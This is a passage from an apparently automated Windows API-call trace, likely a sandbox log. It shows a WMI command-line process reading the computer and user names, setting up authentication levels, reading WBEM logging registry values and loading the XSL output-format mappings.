Attributes=0x0), (Luid.LowPart=0x690057, Luid.HighPart=6553710, Attributes=0x77006f), (Luid.LowPart=0x790053, Luid.HighPart=7602291, Attributes=0x6d0065), (Luid.LowPart=0x57005c, Luid.HighPart=7209065, Attributes=0x6f0064), (Luid.LowPart=0x6f0050, Luid.HighPart=6619255, Attributes=0x530072))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0247.412] free (_Block=0x3b6960) [0247.412] CloseHandle (hObject=0xf4) returned 1 [0247.412] malloc (_Size=0x40) returned 0x3b7f50 [0247.412] malloc (_Size=0x40) returned 0x3b6960 [0247.412] malloc (_Size=0x40) returned 0x3b69b0 [0247.412] malloc (_Size=0x20a) returned 0x3b6a00 [0247.412] GetSystemDirectoryW (in: lpBuffer=0x3b6a00, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0247.412] free (_Block=0x3b6a00) [0247.413] malloc (_Size=0x18) returned 0x3b7fa0 [0247.413] malloc (_Size=0x18) returned 0x3b6a00 [0247.413] malloc (_Size=0x18) returned 0x3b6a20 [0247.413] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13 [0247.413] SysStringLen (param_1="\\kernel32.dll") returned 0xd [0247.413] free (_Block=0x3b7fa0) [0247.413] free (_Block=0x3b6a00) [0247.413] LoadLibraryW (lpLibFileName="C:\\Windows\\system32\\kernel32.dll") returned 0x77940000 [0247.413] GetProcAddress (hModule=0x77940000, lpProcName="SetThreadUILanguage") returned 0x77956d40 [0247.413] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0247.414] FreeLibrary (hLibModule=0x77940000) returned 1 [0247.414] free (_Block=0x3b6a20) [0247.414] _vsnwprintf (in: _Buffer=0x3b69b0, _BufferCount=0x1f, _Format="ms_%x", _ArgList=0x26f3a8 | out: _Buffer="ms_409") returned 6 [0247.414] malloc (_Size=0x20) returned 0x3b7fa0 [0247.414] GetComputerNameW (in: lpBuffer=0x3b7fa0, nSize=0x26f780 | out: lpBuffer="XDUWTFONO", nSize=0x26f780) returned 1 [0247.414] lstrlenW (lpString="XDUWTFONO") returned 9 [0247.414] malloc (_Size=0x14) returned 0x3b6a00 [0247.414] lstrlenW (lpString="XDUWTFONO") returned 9 [0247.414] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x0, nSize=0x26f778 | out: lpNameBuffer=0x0, nSize=0x26f778) returned 0x7fffffde000 [0247.415] GetLastError () returned 0xea [0247.415] malloc (_Size=0x40) returned 0x3b6a20 [0247.415] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x3b6a20, nSize=0x26f778 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x26f778) returned 0x1 [0247.415] lstrlenW (lpString="") returned 0 [0247.415] lstrlenW (lpString="XDUWTFONO") returned 9 [0247.415] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="", cchCount2=0) returned 3 [0247.417] lstrlenW (lpString=".") returned 1 [0247.417] lstrlenW (lpString="XDUWTFONO") returned 9 [0247.417] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2=".", cchCount2=1) returned 3 [0247.418] lstrlenW (lpString="LOCALHOST") returned 9 [0247.418] lstrlenW (lpString="XDUWTFONO") returned 9 [0247.418] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="LOCALHOST", cchCount2=9) returned 3 [0247.418] lstrlenW (lpString="XDUWTFONO") returned 9 [0247.418] lstrlenW (lpString="XDUWTFONO") returned 9 [0247.418] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="XDUWTFONO", cchCount2=9) returned 2 [0247.418] free (_Block=0x3b6a00) [0247.418] lstrlenW (lpString="XDUWTFONO") returned 9 [0247.418] malloc (_Size=0x14) returned 0x3b6a00 [0247.418] lstrlenW (lpString="XDUWTFONO") returned 9 [0247.418] lstrlenW (lpString="XDUWTFONO") returned 9 [0247.418] malloc (_Size=0x14) returned 0x3b6a70 [0247.418] lstrlenW (lpString="XDUWTFONO") returned 9 [0247.418] malloc (_Size=0x8) returned 0x3b6a90 [0247.418] malloc (_Size=0x18) returned 0x3b6ab0 [0247.418] malloc (_Size=0x30) returned 0x3b6ad0 [0247.418] malloc (_Size=0x18) returned 0x3b6b10 [0247.418] SysStringLen (param_1="IDENTIFY") returned 0x8 [0247.418] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0247.418] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0247.418] SysStringLen (param_1="IDENTIFY") returned 0x8 [0247.418] malloc (_Size=0x30) returned 0x3b6b30 [0247.418] malloc (_Size=0x18) returned 0x3b6b70 [0247.418] SysStringLen (param_1="IMPERSONATE") returned 0xb [0247.418] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0247.418] SysStringLen (param_1="IMPERSONATE") returned 0xb [0247.418] SysStringLen (param_1="IDENTIFY") returned 0x8 [0247.418] SysStringLen (param_1="IDENTIFY") returned 0x8 [0247.418] SysStringLen (param_1="IMPERSONATE") returned 0xb [0247.418] malloc (_Size=0x30) returned 0x3b6b90 [0247.418] malloc (_Size=0x18) returned 0x3b6bd0 [0247.419] SysStringLen (param_1="DELEGATE") returned 0x8 [0247.419] SysStringLen (param_1="IDENTIFY") returned 0x8 [0247.419] SysStringLen (param_1="DELEGATE") returned 0x8 [0247.419] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0247.419] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0247.419] SysStringLen (param_1="DELEGATE") returned 0x8 [0247.419] malloc (_Size=0x30) returned 0x3b6bf0 [0247.419] malloc (_Size=0x18) returned 0x3b6c30 [0247.419] malloc (_Size=0x30) returned 0x3b6c50 [0247.419] malloc (_Size=0x18) returned 0x3b6c90 [0247.419] SysStringLen (param_1="NONE") returned 0x4 [0247.419] SysStringLen (param_1="DEFAULT") returned 0x7 [0247.419] SysStringLen (param_1="DEFAULT") returned 0x7 [0247.419] SysStringLen (param_1="NONE") returned 0x4 [0247.419] malloc (_Size=0x30) returned 0x3b6cb0 [0247.419] malloc (_Size=0x18) returned 0x3b6cf0 [0247.419] SysStringLen (param_1="CONNECT") returned 0x7 [0247.419] SysStringLen (param_1="DEFAULT") returned 0x7 [0247.419] malloc (_Size=0x30) returned 0x3b6d10 [0247.419] malloc (_Size=0x18) returned 0x3b6d50 [0247.419] SysStringLen (param_1="CALL") returned 0x4 [0247.419] SysStringLen (param_1="DEFAULT") returned 0x7 [0247.419] SysStringLen (param_1="CALL") returned 0x4 [0247.419] SysStringLen (param_1="CONNECT") returned 0x7 [0247.419] malloc (_Size=0x30) returned 0x3b6d70 [0247.419] malloc (_Size=0x18) returned 0x3b6db0 [0247.419] SysStringLen (param_1="PKT") returned 0x3 [0247.419] SysStringLen (param_1="DEFAULT") returned 0x7 [0247.419] SysStringLen (param_1="PKT") returned 0x3 [0247.419] SysStringLen (param_1="NONE") returned 0x4 [0247.419] SysStringLen (param_1="NONE") returned 0x4 [0247.419] SysStringLen (param_1="PKT") returned 0x3 [0247.419] malloc (_Size=0x30) returned 0x3b6dd0 [0247.419] malloc (_Size=0x18) returned 0x3b6e10 [0247.420] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0247.420] SysStringLen (param_1="DEFAULT") returned 0x7 [0247.420] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0247.420] SysStringLen (param_1="NONE") returned 0x4 [0247.420] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0247.420] SysStringLen (param_1="PKT") returned 0x3 [0247.420] SysStringLen (param_1="PKT") returned 0x3 [0247.420] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0247.420] malloc (_Size=0x30) returned 0x3b8000 [0247.420] malloc (_Size=0x18) returned 0x3b6e30 [0247.420] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0247.420] SysStringLen (param_1="DEFAULT") returned 0x7 [0247.420] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0247.420] SysStringLen (param_1="PKT") returned 0x3 [0247.420] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0247.420] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0247.420] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0247.420] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0247.420] malloc (_Size=0x30) returned 0x3b8040 [0247.421] malloc (_Size=0x40) returned 0x3b6e50 [0247.421] malloc (_Size=0x20a) returned 0x3b6ea0 [0247.421] GetSystemDirectoryW (in: lpBuffer=0x3b6ea0, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0247.421] free (_Block=0x3b6ea0) [0247.421] malloc (_Size=0x18) returned 0x3b6ea0 [0247.421] malloc (_Size=0x18) returned 0x3b6ec0 [0247.421] malloc (_Size=0x18) returned 0x3b6ee0 [0247.421] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13 [0247.421] SysStringLen (param_1="\\wbem\\") returned 0x6 [0247.421] free (_Block=0x3b6ea0) [0247.421] free (_Block=0x3b6ec0) [0247.421] SysStringByteLen (bstr="C:\\Windows\\system32\\wbem\\") returned 0x32 [0247.421] free (_Block=0x3b6ee0) [0247.421] malloc (_Size=0x18) returned 0x3b9400 [0247.421] malloc (_Size=0x18) returned 0x3b9420 [0247.421] malloc (_Size=0x18) returned 0x3b9440 [0247.421] SysStringLen (param_1="C:\\Windows\\system32\\wbem\\") returned 0x19 [0247.421] SysStringLen (param_1="XSL-Mappings.xml") returned 0x10 [0247.421] free (_Block=0x3b9400) [0247.421] free (_Block=0x3b9420) [0247.422] GetCurrentThreadId () returned 0x890 [0247.422] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Wbem\\CIMOM", ulOptions=0x0, samDesired=0x1, phkResult=0x26f080 | out: phkResult=0x26f080*=0xf8) returned 0x0 [0247.422] RegQueryValueExW (in: hKey=0xf8, lpValueName="Logging", lpReserved=0x0, lpType=0x0, lpData=0x26f0d0, lpcbData=0x26f070*=0x400 | out: lpType=0x0, lpData=0x26f0d0*=0x30, lpcbData=0x26f070*=0x4) returned 0x0 [0247.422] _wcsicmp (_String1="0", _String2="1") returned -1 [0247.422] _wcsicmp (_String1="0", _String2="2") returned -2 [0247.422] RegQueryValueExW (in: hKey=0xf8, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x26f070*=0x4 | out: lpType=0x0, lpData=0x0, lpcbData=0x26f070*=0x42) returned 0x0 [0247.422] malloc (_Size=0x86) returned 0x3b6ea0 [0247.422] RegQueryValueExW (in: hKey=0xf8, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x3b6ea0, lpcbData=0x26f070*=0x42 | out: lpType=0x0, lpData=0x3b6ea0*=0x25, lpcbData=0x26f070*=0x42) returned 0x0 [0247.422] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0247.422] malloc (_Size=0x42) returned 0x3b6f30 [0247.422] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0247.422] RegQueryValueExW (in: hKey=0xf8, lpValueName="Log File Max Size", lpReserved=0x0, lpType=0x0, lpData=0x26f0d0, lpcbData=0x26f070*=0x400 | out: lpType=0x0, lpData=0x26f0d0*=0x36, lpcbData=0x26f070*=0xc) returned 0x0 [0247.422] _wtol (_String="65536") returned 65536 [0247.422] free (_Block=0x3b6ea0) [0247.422] RegCloseKey (hKey=0x0) returned 0x6 [0247.422] CoCreateInstance (in: rclsid=0xff327410*(Data1=0xf6d90f12, Data2=0x9c73, Data3=0x11d3, Data4=([0]=0xb3, [1]=0x2e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0xb, [7]=0xb4)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xff3273f0*(Data1=0x2933bf95, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppv=0x26f578 | out: ppv=0x26f578*=0x21271d0) returned 0x0 [0247.442] FreeThreadedDOMDocument:IXMLDOMDocument:load (in: This=0x21271d0, xmlSource=0x26f6c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Windows\\system32\\wbem\\XSL-Mappings.xml", varVal2=0x3b6ea0), isSuccessful=0x26f730 | out: isSuccessful=0x26f730*=0xffff) returned 0x0 [0247.622] FreeThreadedDOMDocument:IXMLDOMDocument:get_documentElement (in: This=0x21271d0, DOMElement=0x26f570 | out: DOMElement=0x26f570*=0x212bc50) returned 0x0 [0247.622] malloc (_Size=0x18) returned 0x3b9420 [0247.622] IXMLDOMElement:getElementsByTagName (in: This=0x212bc50, tagName="XSLFORMAT", resultList=0x26f580 | out: resultList=0x26f580*=0x2129cc0) returned 0x0 [0247.623] free (_Block=0x3b9420) [0247.623] IXMLDOMNodeList:get_length (in: This=0x2129cc0, listLength=0x26f748 | out: listLength=0x26f748*=21) returned 0x0 [0247.624] IXMLDOMNodeList:get_item (in: This=0x2129cc0, index=0, listItem=0x26f550 | out: listItem=0x26f550*=0x212bd50) returned 0x0 [0247.624] IXMLDOMNode:get_text (in: This=0x212bd50, text=0x26f560 | out: text=0x26f560*="texttable.xsl") returned 0x0 [0247.624] IXMLDOMNode:get_attributes (in: This=0x212bd50, attributeMap=0x26f558 | out: attributeMap=0x26f558*=0x21278d0) returned 0x0 [0247.624] malloc (_Size=0x18) returned 0x3b9420 [0247.624] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21278d0, name="KEYWORD", namedItem=0x26f568 | out: namedItem=0x26f568*=0x212a280) returned 0x0 [0247.625] free (_Block=0x3b9420) [0247.625] IXMLDOMNode:get_nodeValue (in: This=0x212a280, value=0x26f5a0 | out: value=0x26f5a0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="TABLE", varVal2=0x60070001c)) returned 0x0 [0247.625] malloc (_Size=0x18) returned 0x3b9420 [0247.625] malloc (_Size=0x18) returned 0x3b9400 [0247.625] malloc (_Size=0x30) returned 0x3b8080 [0247.625] IUnknown:Release (This=0x212bd50) returned 0x0 [0247.625] IUnknown:Release (This=0x21278d0) returned 0x0 [0247.625] IUnknown:Release (This=0x212a280) returned 0x0 [0247.625] IXMLDOMNodeList:get_item (in: This=0x2129cc0, index=1, listItem=0x26f550 | out: listItem=0x26f550*=0x212bd50) returned 0x0 [0247.625] IXMLDOMNode:get_text (in: This=0x212bd50, text=0x26f560 | out: text=0x26f560*="textvaluelist.xsl") returned 0x0 [0247.625] IXMLDOMNode:get_attributes (in: This=0x212bd50, attributeMap=0x26f558 | out: attributeMap=0x26f558*=0x21278d0) returned 0x0 [0247.625] malloc (_Size=0x18) returned 0x3b9460 [0247.626] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21278d0, name="KEYWORD", namedItem=0x26f568 | out: namedItem=0x26f568*=0x212a280) returned 0x0 [0247.626] free (_Block=0x3b9460) [0247.626] IXMLDOMNode:get_nodeValue (in: This=0x212a280, value=0x26f5a0 | out: value=0x26f5a0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="VALUE", varVal2=0x60070001c)) returned 0x0 [0247.626] malloc (_Size=0x18) returned 0x3b9460 [0247.626] malloc (_Size=0x18) returned 0x3b9480 [0247.626] SysStringLen (param_1="VALUE") returned 0x5 [0247.626] SysStringLen (param_1="TABLE") returned 0x5 [0247.626] SysStringLen (param_1="TABLE") returned 0x5 [0247.626] SysStringLen (param_1="VALUE") returned 0x5 [0247.626] malloc (_Size=0x30) returned 0x3b80c0 [0247.626] IUnknown:Release (This=0x212bd50) returned 0x0 [0247.626] IUnknown:Release (This=0x21278d0) returned 0x0 [0247.626] IUnknown:Release (This=0x212a280) returned 0x0 [0247.626] IXMLDOMNodeList:get_item (in: This=0x2129cc0, index=2, listItem=0x26f550 | out: listItem=0x26f550*=0x212bd50) returned 0x0 [0247.626] IXMLDOMNode:get_text (in: This=0x212bd50, text=0x26f560 | out: text=0x26f560*="textvaluelist.xsl") returned 0x0 [0247.626] IXMLDOMNode:get_attributes (in: This=0x212bd50, attributeMap=0x26f558 | out: attributeMap=0x26f558*=0x21278d0) returned 0x0 [0247.626] malloc (_Size=0x18) returned 0x3b94a0 [0247.627] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21278d0, name="KEYWORD", namedItem=0x26f568 | out: namedItem=0x26f568*=0x212a280) returned 0x0 [0247.627] free (_Block=0x3b94a0) [0247.627] IXMLDOMNode:get_nodeValue (in: This=0x212a280, value=0x26f5a0 | out: value=0x26f5a0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="LIST", varVal2=0x60070001c)) returned 0x0 [0247.627] malloc (_Size=0x18) returned 0x3b94a0 [0247.627] malloc (_Size=0x18) returned 0x3b94c0 [0247.627] SysStringLen (param_1="LIST") returned 0x4 [0247.627] SysStringLen (param_1="TABLE") returned 0x5 [0247.627] malloc (_Size=0x30) returned 0x3b8100 [0247.627] IUnknown:Release (This=0x212bd50) returned 0x0 [0247.627] IUnknown:Release (This=0x21278d0) returned 0x0 [0247.627] IUnknown:Release (This=0x212a280) returned 0x0 [0247.627] IXMLDOMNodeList:get_item (in: This=0x2129cc0, index=3, listItem=0x26f550 | out: listItem=0x26f550*=0x212bd50) returned 0x0 [0247.627] IXMLDOMNode:get_text (in: This=0x212bd50, text=0x26f560 | out: text=0x26f560*="rawxml.xsl") returned 0x0 [0247.627] IXMLDOMNode:get_attributes (in: This=0x212bd50, attributeMap=0x26f558 | out: attributeMap=0x26f558*=0x21278d0) returned 0x0 [0247.627] malloc (_Size=0x18) returned 0x3b94e0 [0247.628] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21278d0, name="KEYWORD", namedItem=0x26f568 | out: namedItem=0x26f568*=0x212a280) returned 0x0 [0247.628] free (_Block=0x3b94e0) [0247.628] IXMLDOMNode:get_nodeValue (in: This=0x212a280, value=0x26f5a0 | out: value=0x26f5a0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="RAWXML", varVal2=0x60070001c)) returned 0x0 [0247.628] malloc (_Size=0x18) returned 0x3b94e0 [0247.628] malloc (_Size=0x18) returned 0x3b9500 [0247.628] SysStringLen (param_1="RAWXML") returned 0x6 [0247.628] SysStringLen (param_1="TABLE") returned 0x5 [0247.628] SysStringLen (param_1="RAWXML") returned 0x6 [0247.628] SysStringLen (param_1="LIST") returned 0x4 [0247.628] SysStringLen (param_1="LIST") returned 0x4 [0247.628] SysStringLen (param_1="RAWXML") returned 0x6 [0247.628] malloc (_Size=0x30) returned 0x3b8140 [0247.628] IUnknown:Release (This=0x212bd50) returned 0x0 [0247.628] IUnknown:Release (This=0x21278d0) returned 0x0 [0247.628] IUnknown:Release (This=0x212a280) returned 0x0 [0247.628] IXMLDOMNodeList:get_item (in: This=0x2129cc0, index=4, listItem=0x26f550 | out: listItem=0x26f550*=0x212bd50) returned 0x0 [0247.628] IXMLDOMNode:get_text (in: This=0x212bd50, text=0x26f560 | out: text=0x26f560*="htable.xsl") returned 0x0 [0247.629] IXMLDOMNode:get_attributes (in: This=0x212bd50, attributeMap=0x26f558 | out: attributeMap=0x26f558*=0x21278d0) returned 0x0 [0247.629] malloc (_Size=0x18) returned 0x3b9520 [0247.629] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21278d0, name="KEYWORD", namedItem=0x26f568 | out: namedItem=0x26f568*=0x212a280) returned 0x0 [0247.629] free (_Block=0x3b9520) [0247.629] IXMLDOMNode:get_nodeValue (in: This=0x212a280, value=0x26f5a0 | out: value=0x26f5a0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="HTABLE", varVal2=0x60070001c)) returned 0x0 [0247.629] malloc (_Size=0x18) returned 0x3b9520 [0247.629] malloc (_Size=0x18) returned 0x3b9540 [0247.629] SysStringLen (param_1="HTABLE") returned 0x6 [0247.629] SysStringLen (param_1="TABLE") returned 0x5 [0247.629] SysStringLen (param_1="HTABLE") returned 0x6 [0247.629] SysStringLen (param_1="LIST") returned 0x4 [0247.629] malloc (_Size=0x30) returned 0x3b8180 [0247.629] IUnknown:Release (This=0x212bd50) returned 0x0 [0247.629] IUnknown:Release (This=0x21278d0) returned 0x0 [0247.630] IUnknown:Release (This=0x212a280) returned 0x0 [0247.630] IXMLDOMNodeList:get_item (in: This=0x2129cc0, index=5, listItem=0x26f550 | out: listItem=0x26f550*=0x212bd50) returned 0x0 [0247.630] IXMLDOMNode:get_text (in: This=0x212bd50, text=0x26f560 | out: text=0x26f560*="hform.xsl") returned 0x0 [0247.630] IXMLDOMNode:get_attributes (in: This=0x212bd50, attributeMap=0x26f558 | out: attributeMap=0x26f558*=0x21278d0) returned 0x0 [0247.630] malloc (_Size=0x18) returned 0x3b9560 [0247.630] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21278d0, name="KEYWORD", namedItem=0x26f568 | out: namedItem=0x26f568*=0x212a280) returned 0x0 [0247.630] free (_Block=0x3b9560) [0247.630] IXMLDOMNode:get_nodeValue (in: This=0x212a280, value=0x26f5a0 | out: value=0x26f5a0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="HFORM", varVal2=0x60070001c)) returned 0x0 [0247.631] malloc (_Size=0x18) returned 0x3b9560 [0247.631] malloc (_Size=0x18) returned 0x3b9580 [0247.631] SysStringLen (param_1="HFORM") returned 0x5 [0247.631] SysStringLen (param_1="TABLE") returned 0x5 [0247.631] SysStringLen (param_1="HFORM") returned 0x5 [0247.631] SysStringLen (param_1="LIST") returned 0x4 [0247.631] SysStringLen (param_1="HFORM") returned 0x5 [0247.631] SysStringLen (param_1="HTABLE") returned 0x6 [0247.631] malloc (_Size=0x30) returned 0x3b81c0 [0247.631] IUnknown:Release (This=0x212bd50) returned 0x0 [0247.631] IUnknown:Release (This=0x21278d0) returned 0x0 [0247.631] IUnknown:Release (This=0x212a280) returned 0x0 [0247.631] IXMLDOMNodeList:get_item (in: This=0x2129cc0, index=6, listItem=0x26f550 | out: listItem=0x26f550*=0x212bd50) returned 0x0 [0247.631] IXMLDOMNode:get_text (in: This=0x212bd50, text=0x26f560 | out: text=0x26f560*="xml.xsl") returned 0x0 [0247.631] IXMLDOMNode:get_attributes (in: This=0x212bd50, attributeMap=0x26f558 | out: attributeMap=0x26f558*=0x21278d0) returned 0x0 [0247.631] malloc (_Size=0x18) returned 0x3b95a0 [0247.632] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21278d0, name="KEYWORD", namedItem=0x26f568 | out: namedItem=0x26f568*=0x212a280) returned 0x0 [0247.632] free (_Block=0x3b95a0) [0247.632] IXMLDOMNode:get_nodeValue (in: This=0x212a280, value=0x26f5a0 | out: value=0x26f5a0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="XML", varVal2=0x60070001c)) returned 0x0 [0247.632] malloc (_Size=0x18) returned 0x3b95a0 [0247.632] malloc (_Size=0x18) returned 0x3b95c0 [0247.632] SysStringLen (param_1="XML") returned 0x3 [0247.632] SysStringLen (param_1="TABLE") returned 0x5 [0247.632] SysStringLen (param_1="XML") returned 0x3 [0247.632] SysStringLen (param_1="VALUE") returned 0x5 [0247.632] SysStringLen (param_1="VALUE") returned 0x5 [0247.632] SysStringLen (param_1="XML") returned 0x3 [0247.632] malloc (_Size=0x30) returned 0x3b8200 [0247.632] IUnknown:Release (This=0x212bd50) returned 0x0 [0247.632] IUnknown:Release (This=0x21278d0) returned 0x0 [0247.632] IUnknown:Release (This=0x212a280) returned 0x0 [0247.632] IXMLDOMNodeList:get_item (in: This=0x2129cc0, index=7, listItem=0x26f550 | out: listItem=0x26f550*=0x212bd50) returned 0x0 [0247.632] IXMLDOMNode:get_text (in: This=0x212bd50, text=0x26f560 | out: text=0x26f560*="mof.xsl") returned 0x0 [0247.633] IXMLDOMNode:get_attributes (in: This=0x212bd50, attributeMap=0x26f558 | out: attributeMap=0x26f558*=0x21278d0) returned 0x0 [0247.633] malloc (_Size=0x18) returned 0x3b95e0 [0247.633] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21278d0, name="KEYWORD", namedItem=0x26f568 | out: namedItem=0x26f568*=0x212a280) returned 0x0 [0247.633] free (_Block=0x3b95e0) [0247.633] IXMLDOMNode:get_nodeValue (in: This=0x212a280, value=0x26f5a0 | out: value=0x26f5a0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MOF", varVal2=0x60070001c)) returned 0x0 [0247.633] malloc (_Size=0x18) returned 0x3b95e0 [0247.633] malloc (_Size=0x18) returned 0x3b9600 [0247.633] SysStringLen (param_1="MOF") returned 0x3 [0247.633] SysStringLen (param_1="TABLE") returned 0x5 [0247.633] SysStringLen (param_1="MOF") returned 0x3 [0247.633] SysStringLen (param_1="LIST") returned 0x4 [0247.633] SysStringLen (param_1="MOF") returned 0x3 [0247.633] SysStringLen (param_1="RAWXML") returned 0x6 [0247.633] SysStringLen (param_1="LIST") returned 0x4 [0247.633] SysStringLen (param_1="MOF") returned 0x3 [0247.633] malloc (_Size=0x30) returned 0x3b8240 [0247.633] IUnknown:Release (This=0x212bd50) returned 0x0 [0247.633] IUnknown:Release (This=0x21278d0) returned 0x0 [0247.633] IUnknown:Release (This=0x212a280) returned 0x0 [0247.633] IXMLDOMNodeList:get_item (in: This=0x2129cc0, index=8, listItem=0x26f550 | out: listItem=0x26f550*=0x212bd50) returned 0x0 [0247.633] IXMLDOMNode:get_text (in: This=0x212bd50, text=0x26f560 | out: text=0x26f560*="csv.xsl") returned 0x0 [0247.634] IXMLDOMNode:get_attributes (in: This=0x212bd50, attributeMap=0x26f558 | out: attributeMap=0x26f558*=0x21278d0) returned 0x0 [0247.634] malloc (_Size=0x18) returned 0x3b9620 [0247.634] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21278d0, name="KEYWORD", namedItem=0x26f568 | out: namedItem=0x26f568*=0x212a280) returned 0x0 [0247.634] free (_Block=0x3b9620) [0247.634] IXMLDOMNode:get_nodeValue (in: This=0x212a280, value=0x26f5a0 | out: value=0x26f5a0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CSV", varVal2=0x60070001c)) returned 0x0 [0247.634] malloc (_Size=0x18) returned 0x3b9620 [0247.634] malloc (_Size=0x18) returned 0x3b9640 [0247.634] SysStringLen (param_1="CSV") returned 0x3 [0247.634] SysStringLen (param_1="TABLE") returned 0x5 [0247.634] SysStringLen (param_1="CSV") returned 0x3 [0247.634] SysStringLen (param_1="LIST") returned 0x4 [0247.634] SysStringLen (param_1="CSV") returned 0x3 [0247.634] SysStringLen (param_1="HTABLE") returned 0x6 [0247.634] SysStringLen (param_1="CSV") returned 0x3 [0247.634] SysStringLen (param_1="HFORM") returned 0x5 [0247.634] malloc (_Size=0x30) returned 0x3b8280 [0247.634] IUnknown:Release (This=0x212bd50) returned 0x0 [0247.634] IUnknown:Release (This=0x21278d0) returned 0x0 [0247.634] IUnknown:Release (This=0x212a280) returned 0x0 [0247.635] IXMLDOMNodeList:get_item (in: This=0x2129cc0, index=9, listItem=0x26f550 | out: listItem=0x26f550*=0x212bd50) returned 0x0 [0247.635] IXMLDOMNode:get_text (in: This=0x212bd50, text=0x26f560 | out: text=0x26f560*="texttable.xsl") returned 0x0 [0247.635] IXMLDOMNode:get_attributes (in: This=0x212bd50, attributeMap=0x26f558 | out: attributeMap=0x26f558*=0x21278d0) returned 0x0 [0247.635] malloc (_Size=0x18) returned 0x3b9660 [0247.635] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21278d0, name="KEYWORD", namedItem=0x26f568 | out: namedItem=0x26f568*=0x212a280) returned 0x0 [0247.635] free (_Block=0x3b9660) [0247.635] IXMLDOMNode:get_nodeValue (in: This=0x212a280, value=0x26f5a0 | out: value=0x26f5a0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="texttablewsys.xsl", varVal2=0x60070001c)) returned 0x0 [0247.635] malloc (_Size=0x18) returned 0x3b9660 [0247.635] malloc (_Size=0x18) returned 0x3b9680 [0247.635] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0247.635] SysStringLen (param_1="TABLE") returned 0x5 [0247.635] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0247.635] SysStringLen (param_1="VALUE") returned 0x5 [0247.635] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0247.635] SysStringLen (param_1="XML") returned 0x3 [0247.635] SysStringLen (param_1="XML") returned 0x3 [0247.635] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0247.636] malloc (_Size=0x30) returned 0x3b82c0 [0247.636] IUnknown:Release (This=0x212bd50) returned 0x0 [0247.636] IUnknown:Release (This=0x21278d0) returned 0x0 [0247.636] IUnknown:Release (This=0x212a280) returned 0x0 [0247.636] IXMLDOMNodeList:get_item (in: This=0x2129cc0, index=10, listItem=0x26f550 | out: listItem=0x26f550*=0x212bd50) returned 0x0 [0247.636] IXMLDOMNode:get_text (in: This=0x212bd50, text=0x26f560 | out: text=0x26f560*="texttable.xsl") returned 0x0 [0247.636] IXMLDOMNode:get_attributes (in: This=0x212bd50, attributeMap=0x26f558 | out: attributeMap=0x26f558*=0x21278d0) returned 0x0 